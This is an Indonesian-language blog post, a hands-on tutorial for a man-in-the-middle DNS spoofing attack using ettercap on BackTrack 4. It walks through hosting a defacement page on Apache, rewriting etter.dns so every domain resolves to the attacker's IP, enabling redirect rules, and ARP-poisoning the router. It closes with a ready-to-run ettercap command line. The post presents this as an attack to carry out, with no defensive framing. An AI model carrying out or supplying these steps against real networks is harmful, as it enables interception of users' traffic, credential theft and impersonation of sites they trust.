Home > Linux > BackTrack 4 Man In The Middle Attack DNS Spoofing

BackTrack 4 Man In The Middle Attack DNS Spoofing

DNS spoof adlah membajak permintaan dari client untuk resolve nama domain sehingga Attacker bisa bebas mereply secara palsu request dari client.
bisa dibayangkann
lets do it.
open ettercap-ng GUI mode
1. Unified Sniffing (CTRL + U) IP -> 192.168.1.254

snapshot1111

piluh card interface atau biasanya untuk wireless ialah wlan0


2. aktifkan httpd atau apache

root@bt:~# sh -c “start-apache”

snapshot1112

edit /var/www/index.html dengan halaman deface semau kita.

# kate /var/www/index.html

3. edit etter.dns

root@bt:~# cd /usr/share/ettercap/
root@bt:/usr/share/ettercap# cp etter.dns etter.dns.old
root@bt:/usr/share/ettercap# kate etter.dns

snapshot1113

hapus semua field tulis

* A IP-ATTACKER

4. uncomment ip table ettercap-ng

root@bt:~# kate /etc/etter.conf

uncomment 2 baris, redir_command_on dengan redir_command_off
snapshot5
sehingga menjadi:
snapshot4
save lalu close
5. aktifkan plugin dns_spoof di ettercap (CTRL + P).

snapshot2

aktifkan dengan mengklik 2x.
6. scan hosts list (CTRL + S).

snapshot3

7. add target list (add hanya ip router saja) (CTRL + T).

snapshot4

isi target 1 dengan ip router (/192.168.1.1/)untuk target 2 kosongkan ip agar semua request ip bisa di spoof kita hanya konsen di ip router saja.
8. aktifkan MITM attack ARP Poisoning (Mitm -> Arp Poisoning).

snapshot5

hanya pilih “Sniff remote connections.” klik OK
8.start sniffing happy ending😉 (CTRL + W).

snapshot1

9. ingin mode text? konsole?

root@bt:~# ettercap -i eth0 -T -q -P dns_spoof -M ARP /192.168.1.1/ //

Good Luck!
http://ray16.info/~me/?p=202

Categories: Linux
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: